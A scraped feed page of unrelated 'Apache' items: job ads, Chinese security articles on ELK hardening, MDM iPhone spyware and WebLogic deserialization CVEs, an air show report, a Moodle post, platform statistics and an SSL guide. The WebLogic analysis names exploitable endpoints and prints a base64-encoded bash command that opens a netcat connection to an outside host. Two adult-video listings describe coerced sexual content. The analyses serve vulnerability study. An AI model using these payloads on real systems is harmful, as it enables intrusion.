Η MLS – Making Life Simple αναζητά Προγραμματιστή Unity / Android με έδρα τη Θεσσαλονίκη. Kωδικός θέσης: Π.U.A. Προσόντα: Πτυχίο Α.Ε.Ι. από σχολές πληροφορικής ή πολυτεχνείου PHP / MySQL / Apache / nginx Linux administration Καλή γνώση αγγλικών Καινοτομία και νέες ιδέες Προσανατολισμός στο αποτέλεσμα Θετική και ευχάριστη προσωπικότητα Η...
          Ingenieros informáticos Experencia minima 1 año      Cache   Translate Page   Web Page Cache   
Arkkosoft S.A. - San José - Actitud proactiva para la resolución de problemas. Conocimiento básico en el desarrollo de aplicaciones móviles para iOS, Android. o Utilizando plataformas híbridas como Apache Cordova. Conocimientos en HTML, CSS y Javascript. Deseables: - Conocimiento del marco de trabaj...
          搭建安全认证的ELK日志系统      Cache   Translate Page   Web Page Cache   
*本文原创作者:chuanwei,本文属FreeBuf原创奖励计划,未经许可禁止转载 前言 笔者使用ELK日志系统搭建了日志系统,由于ELK日志系统默认是没有认证功能,日志存储安全无法保证,ELK自身的漏洞也可能增加风险。本文中笔者采用nginx进行代理认证,写此文希望用自己的实验成果能帮到需要的人,提高安全管理人员安全意识。 1.背景 由于网络安全法要求信息系统运营单位的网络日志保留时间不低于6个月,在信息安全等级保护中也有相应要求,日志记录的保存也是执法检查部门近年的关注的重点,原因即是为了安全事件的事后追查,因此信息系统产生的各种日志必须进行安全的保存,规避违法违规风险,尽到作为信息系统运营单位安全保护责任。 因笔者在某政府单位驻场安全运维,该单位没有日志系统,因此决定使用著名的ELK日志系统搭建了日志系统,用于收集全网日志,包括网络设备syslog、操作系统syslog、apahce、tomcat、iis、was、weblogic等。由于ELK日志系统默认是没有认证功能,日志存储安全无法保证,ELK自身的漏洞也可能增加风险,很多人忽略了这一点,网上也没有文章强调认证。本文中我采用了nginx进行代理认证,写此文希望用自己的实验成果能帮到需要的人,提高安全管理人员安全意识。 2. 运行环境 windows 2008 R2 两台作为日志系统服务端, 安装Elasticsearch 5.6.9、Logstash 5.6.9、Nginx1.14.0、JDK1.8+。 centos 6.9 一台作为日志系统客户端,安装filebeat 5.6.9 3. 方案 filebeat:作为客户端采集网站A 网站B….的apache、tomcat、nginx等中间件log文件,并配置tags(用于区分日志类型)和fields:service(用于区分日志来源网站建立不同索引)参数,不使用logstash作为客户端的原因是logstash太占用资源了,还需要java环境。filebeat接收syslog和filebeat发来的日志在filter中根据tags类型格式化,在output中根据fields:service配置索引输出到Elasticsearch不同网站建立不同索引。客户端不会直接请求Elasticsearch的9200端口,确保安全。 Elasticsearch:安装到windows服务器,作日志存储处理,所在服务器开启防火墙: 策略1:允许集群节点之间tcp9200、tcp9300端口、ping通信。 策略2:允许filebeat客户端访问服务器tcp54320和udp514端口(logstash中定义)。策略3:允许管理员ip访问经过nginx代理认证后的head插件端口tcp19100(nginx中自定义)、Elasticsearch的tcp19200端口和kibana的tcp15601端口,方便管理员远程管理。所有策略配置好后客户端无法直接访问Elasticsearch的9100、9200、9300端口和kibana的5601端口,仅管理员可访问代理后的19100、19200、15601端口,对应9100、9200、5601端口。 Kibana:安装到windows服务器,作为日志展示和查询。 Elasticsearch-head:Elasticsearch的图形管理插件。 Nginx:安装到主windows服务器节点,因为Elasticsearch默认是无认证的,日志可被恶意删除,无论在内网还是公网都是非常危险的,因此有必要采用nginx进行反向代理认证。 Nssm:将免安装的logstah、kibana、nginx安装为服务,配置为自动启动。 *对于性能有需求的可考虑使用redis,非本文关注重点,不再介绍了。 4. 下载必要软件和版本选择 *ELK5.6.9支持到windows server 2008 操作系统,更高版本需要windows server 2012操作系统。资源下载地址: Elasticsearch 5.6.9:https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.6.9.zip Logstash 5.6.9:https://artifacts.elastic.co/downloads/logstash/logstash-5.6.9.zip filebeat 5.6.9 Linux:https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-5.6.9-x86_64.rpm filebeat 5.6.9 Windows:https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-6.3.2-windows-x86_64.zip Kibana 5.6.9:https://artifacts.elastic.co/downloads/kibana/kibana-5.6.9-windows-x86.zip JDK(1.8以上):http://download.oracle.com/otn-pub/java/jdk/8u171-b11/512cd62ec5174c3487ac17c61aaa89e8/jdk-8u171-windows-x64.exe elasticsearch-head:https://github.com/mobz/elasticsearch-head#running-with-built-in-server nginx 1.14.0:http://nginx.org/download/nginx-1.14.0.zip nssm:http://www.nssm.cc/release/nssm-2.24.zip 5. 安装ELK 5.1 Elasticsearch安装配置 解压修改配置文件即可运行。 请注意有一个坑:elasticsearch必须是两个组成集群,不然会出现错误,也可在同一台服务器运行两个elasticsearch,如果启动报错,是因为复制两个elasticsearch时data目录已有数据,造成冲突,清空data里面的数据即可启动两个elasticsearch。本文采用两台服务器搭建,配置如下: 主节点配置文件elasticsearch.yml #禁用虚拟内存,提高性能 bootstrap.memory_lock: true #节点名称自定义: cluster.name: elasticsearch #数据通信端口: http.port: 9200 #监听网卡ip network.host: 192.168.1.1 #是否是数据节点: node.data: true #关闭即可: node.ingest: true #是否是主节点,不定义的话先启动的是主节点: node.master: true #最大存储节点: node.max_local_storage_nodes: 1 #节点名字自定义: node.name: Win-Master-1 #数据文件路径 path.data: D:\elk\elasticsearch\data path.logs: D:\elk\elasticsearch\logs #节点间通信端口: transport.tcp.port: 9300 #节点ip,节点之间要允许ping和9300端口通信 discovery.zen.ping.unicast.hosts: […]
          使用MDM软件的iPhone黑客攻击活动比以前更为广泛      Cache   Translate Page   Web Page Cache   
两周前首次亮相的印度高度针对性的移动恶意软件广告系列已被发现是针对多种平台的广泛广告系列的一部分,包括Windows设备,也可能是Android。 正如我们在上一篇文章中所报道的那样,本月早些时候,Talos威胁情报部门的研究人员发现一群印度黑客滥用移动设备管理(MDM)服务劫持并监视印度一些有针对性的iPhone用户。 自2015年8月开始运营以来,已发现攻击者滥用MDM服务将恶意版本的合法应用程序(包括Telegram,WhatsApp和PrayTime)远程安装到目标iPhone上。 这些经过修改的应用程序旨在暗中监视iOS用户,并从第三方聊天应用程序窃取他们的实时位置,短信,联系人,照片和私人消息。 在他们正在进行的调查中,Talos研究人员发现了一个新的MDM基础设施和几个恶意二进制文件 – 旨在针对运行Microsoft Windows操作系统的受害者 – 托管在之前广告系列中使用的相同基础架构上。 Ios-update-whatsapp [。] com(新) Wpitcher [。] COM Ios-certificate-update.com 研究人员在今天发表的博客文章中表示,“我们知道MDM和Windows服务在2018年5月在同一台C2服务器上运行。” “目前有些C2服务器仍处于运行状态.Apache设置非常具体,与恶意IPA应用程序的Apache设置完美匹配。” 除此之外,研究人员还发现了一些潜在的相似之处,将此活动与一个名为“Bahamut”的老黑客组织联系在一起,该组织是一名先前的威胁演员,之前使用与最新iOS恶意软件活动中使用的类似MDM技术的Android设备。 新确定的MDM基础设施于2018年1月创建,今年1月至3月使用,针对两个印度设备和一个位于卡塔尔的英国电话号码。 根据研究人员的说法,Bahamut还在他们的Android恶意软件活动中针对类似的卡塔尔个人,Bellingcat在博客文章中对此进行了详细介绍  。 研究人员表示,“Bahamut与我们之前发布的一篇恶意iOS应用程序共享了一个域名。” “我们发现的新MDM平台与中东目标有类似的受害者,即卡塔尔,使用LycaMobile发布的英国手机号码.Bahamut在竞选期间针对类似的卡塔尔个人。” 除了分发具有恶意功能的修改过的Telegram和WhatsApp应用程序外,新发现的服务器还分发修改后的Safari浏览器版本和IMO视频聊天应用程序,以窃取受害者的更多个人信息。 攻击者使用恶意Safari浏览器窃取登录凭据 根据研究人员的说法,恶意Safari浏览器已预先配置为自动泄露用户的用户名和密码,用于各种其他Web服务,Yahoo,Rediff,Amazon,Google,Reddit,Baidu,ProtonMail,Zoho,Tutanota和更多。 “恶意软件持续监控网页,在用户输入用户名和密码时查找包含用户名和密码的HTML表单字段以窃取凭据。检查的HTML字段的名称将与域名一起嵌入到应用程序中,”研究员说。 恶意浏览器包含三个恶意插件 – 添加书签,添加到收藏夹和添加到阅读列表 – 就像其他应用程序一样,将被盗数据发送到远程攻击者控制的服务器。 目前还不清楚是谁支持该活动,谁是该活动的目标,以及攻击背后的动机是什么,但技术要素表明攻击者是在印度运营,并且资金充足。 研究人员表示,那些感染此类恶意软件的人需要注册他们的设备,这意味着“他们应该随时注意以避免意外登记”。 避免成为此类攻击的受害者的最佳方法是始终从官方应用商店下载应用。 *本文作者:抗生素1209,转载请注明来自Freebuf.COM
          缝缝补补的WebLogic:绕过的艺术      Cache   Translate Page   Web Page Cache   
前言 目前Weblogic在全球的使用量占居前列,据统计,在全球范围内对互联网开放Weblogic服务的资产数量多达35382台,其中归属中国地区的资产数量为10562台。如果爆发一个Weblogic高危漏洞,那将会给中国的大量用户带来巨大的灾难。 本文主要介绍了近五年爆发的Weblogic反序列化的高危漏洞,一次又一次的修补,一次又一次的绕过,漏洞挖掘者和漏洞防御者之间的博弈从未停止过,而且这种博弈在今后的生活中也将会愈演愈烈。 0×01 Weblogic简介 Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和 数据库应用的Java应用服务器。 Weblogic将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,是商业市场上主要的Java(Java EE)应用服务器软件之一,也是世界上第一个成功商业化的Java EE应用服务器,具有可扩展性、快速开发、灵活、可靠等优势。 在功能性上,Weblogic是Java EE的全能应用服务器,包括EJB 、JSP、servlet、JMS等,是商业软件里排名第一的容器(JSP、servlet、EJB等),并提供其他工具(例如Java编辑器),因此也是一个综合的开发及运行环境。 在扩展性上,Weblogic Server凭借其出色的群集技术,拥有处理关键Web应用系统问题所需的性能、可扩展性和高可用性。Weblogic Server既实现了网页群集,也实现了EJB组件群集,而且不需要任何专门的硬件或操作系统支持。网页群集可以实现透明的复制、负载平衡以及表示内容容错。无论是网页群集,还是组件群集,对于电子商务解决方案所要求的可扩展性和可用性都是至关重要的。 目前Weblogic在全球的使用量也占居前列,据统计,在全球范围内对互联网开放Weblogic服务的资产数量多达35382台,美国和中国的Weblogic的使用量接近Weblogic总使用量的70%,其中归属中国地区的资产数量为10562台。 这样的话,如果爆发一个Weblogic高危漏洞,那将会给中国的大量用户带来巨大的灾难。 0×02 高危漏洞介绍 Weblogic漏洞有很多,但是五年之前的大多数漏洞只是小打小闹,对服务器并不能造成巨大的影响。然而,自从2015年11月6日,FoxGlove Security 安全团队的 @breenmachine 在博客中介绍了如何利用Java反序列化和 Apache Commons Collections 这一基础类库来攻击最新版的 Weblogic、WebSphere、JBoss等主流的Java服务器,并且都可以实现远程代码执行,Weblogic变得不再安全。 道高一尺魔高一丈,伴随着Weblogic补丁的不断发布,各种的绕过方法也是不断地更新。下面介绍一下近5年来让Oracle头痛不已的Weblogic反序列化漏洞。 高危漏洞主要涉及到两个种类: 利用xml decoded反序列化进行远程代码执行的漏洞,例如:CVE-2017-10271,CVE-2017-3506。 利用java反序列化进行远程代码执行的漏洞,例如:CVE-2015-4852、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628、CVE-2018-2894。 xml decoded反序列化RCE漏洞 1. CVE-2017-3506 此漏洞主要是由于wls组件使用了webservice来处理soap请求,在weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest方法中,当localHeader1和localHeader2都不为null时,将会把<work:WorkContext>所包含的数据传入weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld方法。在此方法中,对WorkContextXmlInputAdapter类进行了实例化,并调用WorkContextXmlInputAdapter类的构造方法,通过XMLDecoder()进行反序列化操作。 weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest代码如下图所示: weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld代码如下图所示: weblogic.wsee.workarea.WorkContextXmlInputAdapter代码如下图所示: CVE-2017-3506 POC /wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11 在上方8个路径中任意选择一个路径,将content-type改成text/xml类型,传入payload,即可利用漏洞。 在上方的POC中,闭合的<work:WorkContext>中可以构造任何我们想要执行的命令。在先后引用java.beans.XMLDecoder、java.lang.ProcessBuilder、java.lang.String之后,便可以在index中设定参数序号,并在string标签中传入想要远程执行的命令。 2. CVE-2017-10271漏洞 CVE-2017-10271是基于CVE-2017-3506漏洞原理基础上,对CVE-2017-3506修复补丁的一次绕过。下图是CVE-2017-3506修复补丁的部分代码: 图中红框内的代码是限制CVE-2017-3506漏洞利用的黑名单,这次补丁修补得非常的简陋,仅仅是根据POC中的object标签进行了修补,所以很快就出现了CVE-2017-10271漏洞。 CVE-2017-10271的POC与CVE-2017-3506的POC很相似,只是将object标签换成了array或void等标签,即可触发远程代码执行漏洞。 因此,在CVE-2017-10271漏洞爆发之后,Oracle官方也进行了补丁的完善,这一次的补丁考虑得比较全面,在黑名单中又添加了new、method、void、array等关键字进行漏洞修补,成功防御了CVE-2017-10271漏洞。 java反序列化RCE漏洞 1. CVE-2015-4852漏洞 此漏洞主要是由于apache的标准库中Apache Commons Collections基础库的TransformedMap类。当TransformedMap内的key或者value发生变化时,就会触发相应的Transformer的transform()方法。同时也可以利用Transformer数组来构造ChainedTransformer,从而触发内部的InvokerTransformer类,在这个类中可以利用java的反射机制来获得Runtime.getRuntime().exec方法,利用这个方法来执行任意命令。 通过AnnotationInvocationHandler类来重写readObject()方法,并且通过内部的memberValue.setValue()方法构造恶意的TransformedMap对象,改变TransformedMap中的key或value,通过反序列化执行构造的命令。这里推荐大家了解一下ysoserial这个工具。 工具中集成了各种java反序列化漏洞利用的payload。下图是ysoserial工具中有关于java反射机制的代码。 图片中即是利用Transformer数组触发InvokerTransformer类,利用java反射机制获得Runtime.getRuntime().exec方法,从而达到执行任意命令的目的。 CVE-2015-4852 POC(序列化) 序列化中的cmd字段代表着想要远程执行的命令,使用python中binascii.b2a_hex函数转换成序列化插在相应的位置上。在这里再为大家推荐一款分析java序列化结构的工具——SerializationDumper,下图是通过SerializationDumper转换后的序列化的结构: 图中红框内是序列化中插入远程执行命令的序列化,同时对应着序列化解码之后的命令。通过这个分析工具,我们可以准确的找到序列化远程命令插入的位置,以及序列化的结构和引用的函数,让分析java反序列化漏洞的payload的工作变得更加便利。 2. CVE-2016-0638漏洞 此漏洞是基于CVE-2015-4852漏洞进行黑名单的绕过,CVE-2015-4852补丁主要应用在三个位置上: weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStream weblogic.rjvm.MsgAbbrevInputStream.class    weblogic.iiop.Utils.class 所以如果能找到可以在其readObject中创建自己的InputStream的对象,并且不是使用黑名单中的ServerChannelInputStream和MsgAbbrevInputStream的readExternal进行的反序列化,最后调用readObject()方法进行反序列化的数据的读取,这样就可以执行含有恶意代码的序列化代码。CVE-2016-0638漏洞就是依据这个思路找到了weblogic.jms.common.StreamMessageImpl类,其中的readExternal()方法也符合攻击的需求。攻击者可以在其中构造一个恶意的ObjectInputStream来实现payload内部的InputStream创建,调用readObject()方法实现攻击。 CVE-2016-0638 POC(序列化) 此漏洞利用方式也应用到了后续要介绍的CVE-2018-2893漏洞中。 3. CVE-2016-3510漏洞 此漏洞是与CVE-2016-0638漏洞利用方式相似,只是选择了weblogic.corba.utils.MarshalledObject进行绕过,绕过之前的CVE-2015-4852和CVE-2016-0638漏洞的修复补丁。 CVE-2016-3510 POC(序列化) CVE-2016-3510的POC中插入的想要执行的命令的形式很特殊,必须要插入类似于bash -c {echo,bmMgLW52IDE5Mi4xNjguMTYuMSA0MDQw}|{base64,-d}|{bash,-i}这种形式的命令才可以达到攻击效果,这是因为使用了java.lang.Runtime.exec(String)语句而导致的一些限制。首先是不支持shell操作符,如输出重定向以及管道。其次是传递给payload命令的参数中不能包含空格。 4.CVE-2017-3248漏洞 CVE-2017-3248漏洞爆发之前,Apache Commons […]
          RSAF50@Marina Barrage: Republic of Singapore Air Force to Celebrate 50th Anniversary with Aerial Displays over National Day weekend on 11 and 12 Aug 2018      Cache   Translate Page   Web Page Cache   
Two helicopters to perform for the first time in RSAF's largest aerial show of the year
By Lim Min Zhang, The Straits Times, 8 Aug 2018

This weekend, the Republic of Singapore Air Force (RSAF) will be showcasing more than 20 aircraft in its biggest aerial display this year. It will also feature two of its helicopters doing aerial manoeuvres together for the first time.

A pair of RSAF AH-64D Apache attack helicopters will perform 10 synchronised manoeuvres at the Marina Barrage on Saturday and Sunday. The RSAF50@Marina Barrage event, organised to commemorate the air force's golden jubilee this year, will feature a total of 29 aircraft - 25 from the RSAF and four from the Singapore Youth Flying Club.

There will also be an unmanned aircraft for the first time - the Heron 1 Unmanned Aerial Vehicle - in a pre-show segment.

The public can watch two 30-minute shows each day at 10am and 2.30pm. The aerial display will also be streamed live on the RSAF's Facebook page.



The RSAF did a full rehearsal at a media preview yesterday, witnessed by Defence Minister Ng Eng Hen. The full sequence for the show is: A sequential flypast, a helicopter and fighter jet aerial display and a finale bomb burst manoeuvre.

Lieutenant-Colonel Nick Wong, chairman of the flying display committee, said: "This time, we are trying to do something different - new profiles and display segments - and this shows the professionalism and capabilities of the air force as well as the ability to work together as a team."



Nineteen RSAF combat aircraft and four Singapore Youth Flying Club DA40 trainer aircraft will perform the flypast in five formations.

The formations will fly at different altitudes between 500ft (152m) and 2,000ft, about 60 seconds apart.

Captain Ingkiriwang Reeve, one of the performing AH-64D pilots, said having two helicopters perform together is exponentially more difficult than a single one as there are many extra factors to consider. He will have to follow the lead given by the other helicopter for the aerial manoeuvres and adjust according to wind conditions, he said.

"We also have to fly imperfectly to make it look perfect because the people on the ground are looking at it from a different angle," he added.



Two F-16C fighter jets and one F-15SG will also perform 18 aerial manoeuvres, including five new ones that were not performed at the Singapore Airshow in February.

Besides catching the aerial displays, families can also enjoy a picnic at the barrage organised by Families For Life on Saturday. There will be activities such as sand art and paper-plane making. Minister for Social and Family Development Desmond Lee will be at the picnic, which is from 8am to 4pm.



The Chief of Air Force, Major-General Mervyn Tan, who was at the preview, said the RSAF50@Marina Barrage is one of the events designed to thank Singaporeans for their support of the air force over the years.

He said: "We hope that Singaporeans will enjoy the show and continue to give their fullest support to our airmen and women who are committed to defend our home, above all."























Related
RSAF to Celebrate 50th Anniversary with Aerial Displays over National Day weekend
RSAF50: Aerial displays, heartland exhibitions to mark the Republic of Singapore Air Forces' 50th birthday

          Deep learning anomalies with TensorFlow and Apache Spark      Cache   Translate Page   Web Page Cache   
Deep learning is always among the hottest topics and TensorFlow is one of the most popular frameworks out there. In this session, Khanderao Kand ...
          Talend with Big Data - Kovan Technology Solutions - Houston, TX      Cache   Translate Page   Web Page Cache   
Hi, We are currently looking for Talend Developer with the below skills 1) Talend 2) XML, JSON 3) REST, SOAP 4) ACORD 5) Hadoop - HDFS, AWS EMR 6) Apache...
From Indeed - Fri, 27 Jul 2018 13:34:33 GMT - View all Houston, TX jobs
          AP-568 Shoplifter Girls Female Backyard Restrained Gang 2 Shoplifting Girls      Cache   Translate Page   Web Page Cache   
AP-568 Shoplifter Girls Female Backyard Restrained Gang 2 Shoplifting Girls ● Capturing Raw, Restraining On Back Yards, Every Employee Swaps And Switches Over And Adds Sexual Sanctions Director: Masanori Maker: Apache (Demand) Label: HHH Group Genre(s): RestraintSchool GirlsGangbangSchool Uniform
          AP-569 Shoot Underwear Through A Sudden Guerrilla Rainstorm Shoot The Busty Young Woman      Cache   Translate Page   Web Page Cache   
AP-569 Shoot Underwear Through A Sudden Guerrilla Rainstorm Shoot The Busty Young Woman On The Way Back Let Me Feel With The Poo Director: Kunioka Maker: Apache (Demand) Label: HHH Group Genre(s): CreampieBig TitsNasty, HardcoreBride, Young WifeLingerie Cast: Oshikawa Yuuri, Mihara Honoka
          Développeur Java/JEE - Voonyx - Lac-beauport, QC      Cache   Translate Page   Web Page Cache   
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Thu, 26 Jul 2018 05:13:45 GMT - View all Lac-beauport, QC jobs
          Java/JEE Developer - Voonyx - Lac-beauport, QC      Cache   Translate Page   Web Page Cache   
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Thu, 26 Jul 2018 05:13:41 GMT - View all Lac-beauport, QC jobs
          Conseiller en architecture technologique web - iA Groupe financier - Québec City, QC      Cache   Translate Page   Web Page Cache   
Expert des technologies comme Microsoft IIS, API Gateway, IBM WebSphere, Netscaler, Apache, IBM MQ Series, WebService ou toutes autres technologies pertinentes...
From iA Financial Group / iA Groupe financier - Fri, 08 Jun 2018 06:16:49 GMT - View all Québec City, QC jobs
          Can not initialise PHP session, please verify that your browser accepts cookies.      Cache   Translate Page   Web Page Cache   
by Robert Montano.  

Hi Guys,

I know that this error had been discussed before. But I could find a concrete solution so I have opened another thread. Hoping that I could help the devs on trying to find a solution for future admins that would encounter the same problem.

August 1 2018, when I tried to install our Moodle 3.5.1+ system into a newly formatted RHEL 7.5 server. After all the configurations, I was ready to go to the Web Installation interface. All prerequisites where marked check except for the HTTPS (not configured yet which is still okay). When I clicked 'Continue', it went on to the installation as normally until just exactly right before the input of the Administrator User Info page. This is the error that I got...

=================

Error

=================

Can not initialise PHP session, please verify that your browser accepts cookies.

More information about this error

=================

<see image attached>

There is a 'Continue' button but it only loops back into the same page.


I was using Goodle Chrome (as shown in the image attached) when I got this error. I tried to continue the installation with Firefox but it also gives me the same error. I got stucked on the installation for almost a whole day looking for solution and figuring out what could be wrong?

The issue seems to be pointing to the browsers ability to handle cookies. But just a week ago I installed my backup Moodle server on another Ubuntu 18.04 system with the using same browsers and had no issues at all.

Funny, my college asked me if I could try it in IE (Internet Explorer) and see what happens. Nothing to lose so I tried it and it gave me the page to input the Administrator user info. But obviously the password can't be encoded in IE (so can't continue). I got an idea to try another browser so I installed Opera. Opera went fine and continued to finish my Moodle installation.

Just right after the installation was completed in the Opera browser. I tried to open the same website on both Firefox and Chrome and both worked perfectly fine this time.


What could be wrong with the installation on both Firefox and Chrome on the handling of cookies that IE and Opera doesn't have.

I don't think it's an issue with the 2 most commonly used browsers. My observation we might have missed (overlooked) something in our installation files? What do your guys think?


I just hope this could shed some light for the Devs in trying to fix the issue and a workaround for those who will get stock, just as I had.


Software Versions:

RHEL 7.5

Moodle 3.5.1+

PHP 7.2.8

Apache 2.4.6

MySQL 8.0.12


Firefox 61.0.1 (64-bit)

Chrome Version 67.0.3396.99 (Official Build) (64-bit)

IE 8.0.7601.17514

Opera 54.0.2952.64


          Re: 3.4.4 upgrade to 3.5.1 Error 500      Cache   Translate Page   Web Page Cache   
by Howard Miller.  

php -v tells you the command line version of PHP, not the version that Apache is using. They are completely different. 

The only way to be sure is to create a little test script and run it through your browser. 

<?php phpinfo();


          OSGI Servlet not found when I hit the servlet path      Cache   Translate Page   Web Page Cache   

Hi All,

 

I'm just replacing the felix annotations with OSGi DS annotations for my servlet and I could able to build the project success. Once I deploy the bundle and hit the servlet path I'm getting 404 response in the page and the error log I'm getting this org.apache.sling.engine.impl.SlingRequestProcessorImpl service: Resource /bin/custom/sample not found.

 

Thing I have tried:

  • Tried with uber 6.3.0, 6.4.0 & 6.4.1
  • tried with Maven-bundle-plugin version 3.2.0 & 3.3.0

 

 

I checked my servlet is active and I'm having the required entries in pom.xml. But when I compared the servlet which is used Felix and OSGI annotation I could not see the Reference package in OSGI servlet. Below are the screen shot of felix & OSGi servlet. Further what I should check? Appreciate your help.

 

 

Felix Servlet:

 

 

OSGI Servlet:

 

Regards,

Vijay


          Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018      Cache   Translate Page   Web Page Cache   

Modern technologies do not stand still, they’re constantly evolving. We analyzed the current statistics of engines, application servers, databases and plug-ins under a magnifying glass, revealing which stacks are the most rated and more actively used. Let’s get acquainted with the detailed report based on the choice of Jelastic PaaS users.

Engines Jelastic cloud platform provides support of Java, php, Ruby, Node.js, python, .NET and Go. According to the statistics, the customers choose mainly two leading programming languages. The latest research shows that PHP shoots ahead with 58.3%, and Java has 33.1% of customers choice. The rest programming languages get much less distribution (8,6% in total) but the situation can change.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
The statistical data that was gathered on the geographical spread of the engines, showed that customers from the Asia Pacific (APAC) mostly use Java for their applications. On the other hand, users in Europe, Middle East and Africa (EMEA), as well as Latin America (LATAM), give their main priority to PHP, and in Northern America (NA), the percentage is approximately the same. It is noteworthy that Node.js is used approximately equally in all regions, while Ruby is more popular in Latin America.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
PHP Versions PHP is considered one of the easiest to use server-side scripting languages. Most of the Jelastic PHP users are running their projects on v7.1 (24.8%) and v5.6 (22.7%). Versions 7.0 and 5.4 have also high rates, 17.4%, and 15.6% respectively.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
JDK Versions

Java enables the development of secure, highly performed, and robust applications in heterogeneous, distributed networks. So that is why it’s one of the most widely used programming languages among enterprise projects.

On the graphic below you can see that the majority of Java environments in Jelastic PaaS were created with Java 8 (67.7%) and Java 7 (22.7%). Java 10 that was just recently released, already gained 1.8% and actively growing.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
PHP vs Java Geo-Distribution Comparing PHP and Java, we can see that Asia Pacific countries commonly use Java. Northern America almost equally likes both of them. While others (EMEA, LATAM) prefer PHP programming language.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Application Servers Taking into account that PHP and Java are the leading programming languages, that’s not a surprise that Apache and Tomcat are the most demanded among other application servers. 46.5% of users installed Apache PHP for running their environments, and 27.3% chose Tomcat hosting. NGINX attracted 13% of customers. And the rest of the servers (Node.js, GlassFish , WildFly , SpringBoot , NGINX Ruby, TomEE, Jetty, SmartFox Server, IIS, Apache Ruby, JBoss, Goland, and Raptor) got 3.2% in total.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
The geographical situation with the servers spread is similar to the engine usage: Tomcat is widely spread in North America, LATAM, and the Asia Pacific, while Apache is mostly popular in EMEA and LATAM countries.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Databases

Let’s find out the database servers usage. From the chart below, you can see that mysql got the 1st place with 55,4% of installations, moreover, the number is growing, especially considering an easy way to install it with already pre-configured replication .

MariaDB (20.8%) and PostgreSQL (14.4%) hold respectively the second and the third places. The fourth goes to MongoDB with 4.5%, while the rest database servers (Redis, Percona, Microsoft SQL, CouchDB, OrientDB, Neo4j) share the remnant of user’s favor.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Considering the distribution by regions, we can highlight that MySQL is popular in all parts of the world, especially in North America. MariaDB is in the tops in EMEA and keeps wide-spreading. PostgreSQL is more or less evenly distributed with the highest results in APAC.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Integrated Development Environments (IDE)

IDEs are used by development teams to build new software, applications, and services in a convenient way. Analyzing our statistics, we can differ three mostly used IDEs that are integrated to the Jelastic PaaS, and can be installed easily:

NetBeans Eclipse IntelliJ IDEA As it can be viewed in a picture below, more than a half of our clients (50.5%) prefer to build their projects in NetBeans, a bit less than a third part (22.6%) write their code in IDEA, and the rest (26.9%) choose Eclipse.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Top Applications Installed in One Click

Jelastic provides a marketplace of ready-to-go applications, clusters, and add-ons built with own packaging standard. Such pre-configured solutions are automatically installed and require minimal to no involvement in the further management and support.

Here are top 10 applications and add-ons which became most favored by Jelastic users:

WordPress Let’s Encrypt
          /net-sourceforge-MSSCodeFactory-CFBam-2.10.10027-ApacheV2-src.zip      Cache   Translate Page   Web Page Cache   
none
          Confluence 6 通过 SSL 或 HTTPS 运行 - 创建或请求一个 SSL 证书      Cache   Translate Page   Web Page Cache   

在启用 HTTPS 之前,你需要一个有效的证书,如果你已经有了一个有效的证书,你可以直接跳过这个步骤,进入 step 2

你可以创建一个自签名的证书,或者从信任的 Certificate Authority 中获得一个证书。

如果你的项目小组计划使用 Confluence 服务器移动 app。你需要你的证书是从信任的证书签发机构签发的。你不能使用自签名的证书或者从一个不信任的机构获得的证书,或者自由 CA。

选项 1: 创建一个自签名证书

当你需要进行加密,但是你并不需要对网站的的请求校验的话,自签名证书能够帮助你完成这个。在通常的情况下,你可以在你的测试环境下签发你的自签名证书,你也可以在你公司内部的网络上签发自签名证书。

因为证书不是信任的组织签发的(CA),用户可能会收到站点不被信任,并且提供一个步骤让用户先确定,才能访问网站的信息。这个通常是在第一次访问网站的时候出现的提示。如果你使用的 Confluence 的移动 app 的话,用户不能通过你的自签名证书访问你的 Confluence 站点。

在这个情况下,我们需要使用 Java 的 keytool 工具包。这个工具包是包含在 JDK 中的。如果你对命令行工具并不是十分熟悉的话,你可以考虑使用 KeyStore Explorer 工具。

使用 keytool 来创建一个自签名证书:

  1. 从命令行中,为你的操作系统运行正确的命令:
    Windows
    "%JAVA_HOME%\bin\keytool" -genkeypair -keysize 2048 -alias tomcat -keyalg RSA -sigalg SHA256withRSA
    Linux (and MacOS)
    $JAVA_HOME/bin/keytool -genkeypair -keysize 2048 -alias tomcat -keyalg RSA -sigalg SHA256withRSA
  2. 当出现提示后,为你的证书创建 密码(password ),私有 key。
    • 仅使用数字和英文字符。如果你使用了特殊字符,Tomcat 可能会出现错误。
